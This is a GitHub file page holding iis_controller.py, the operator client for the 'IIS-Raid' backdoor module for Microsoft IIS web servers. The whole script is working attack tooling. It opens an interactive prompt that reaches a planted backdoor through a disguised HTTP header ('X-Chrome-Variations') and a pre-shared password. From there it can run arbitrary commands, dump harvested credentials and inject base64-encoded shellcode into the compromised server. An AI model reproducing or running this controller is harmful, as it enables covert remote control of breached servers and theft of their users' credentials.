-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathiis_controller.py
112 lines (76 loc) · 2.79 KB
/
iis_controller.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
import requests
import argparse
import base64
import cmd
class Prompt(cmd.Cmd):
def help_cmd(self):
print("Execute a command on the server.\nUsage: cmd <command to execute>\n")
def help_exit(self):
print("Exits")
def help_inject(self):
print("Inject shellcode on the server.\nUsage: inject <file>\n")
def help_dump(self):
print("Dump extracted credentials.\nUsage: dump\n")
def do_inject(self,shellcode):
InjectShellcode(shellcode)
def do_cmd(self, command):
if(command != ""):
ExecuteCommand(command)
else:
print("Specify a command.")
def do_dump(self,ignore):
DumpCreds()
def do_exit(self,ignore):
exit(0)
def emptyline(self):
pass
def SendRequest(data):
if(args.method == "GET"):
resp = requests.get(args.url,headers={args.header: data , "X-Password": args.password})
elif(args.method == "POST"):
resp = requests.post(args.url,headers={args.header: data , "X-Password": args.password})
if(resp.status_code != 200):
print("[-] Status code invalid : " + str(resp.status_code))
exit(0)
try:
encoded_response = resp.headers[args.header]
except:
print("[-] Header not found. Invalid password or backdoor is not present. [-]")
exit(0)
response = base64.b64decode(encoded_response).decode('gb2312')
return response
def Check():
print("[+] Testing URL {0}".format(args.url))
response = SendRequest("PIN|G")
if(response == "PONG"):
print("[+] Successfully connected to {0}\n".format(args.url))
return True
else:
return False
def ExecuteCommand(command):
response = SendRequest("CMD|" + command)
print("[+] Received output [+]\n{0}".format(response))
def DumpCreds():
response = SendRequest("DMP|CREDS")
print("[+] Received output [+]\n{0}".format(response))
def InjectShellcode(file):
with open(file, "rb") as binaryfile :
shellcode = bytearray(binaryfile.read())
encoded_shellcode = base64.b64encode(shellcode).decode("utf-8")
print("[+] Shellcode size : {0}".format(len(shellcode)))
response = SendRequest("INJ|" + encoded_shellcode)
if(response == "DONE"):
print("[+] Shellcode Injected Successfully")
# IIS-Raid
parser = argparse.ArgumentParser(description="IIS-Raid Controller")
parser.add_argument('--url', required=True , type=str ,help="URL to use for communication.")
parser.add_argument('--header', type=str, default="X-Chrome-Variations", help="Header to use for communication.")
parser.add_argument('--method', type=str, default="GET", help="Method to use for communication.")
parser.add_argument('--password', required=True,type=str, help="Pre-shared password.")
args = parser.parse_args()
if(Check()):
p = Prompt()
p.prompt = "IIS-RAID #> "
p.cmdloop()
else:
print("[-] Failed to connect to {0} ".format(args.url))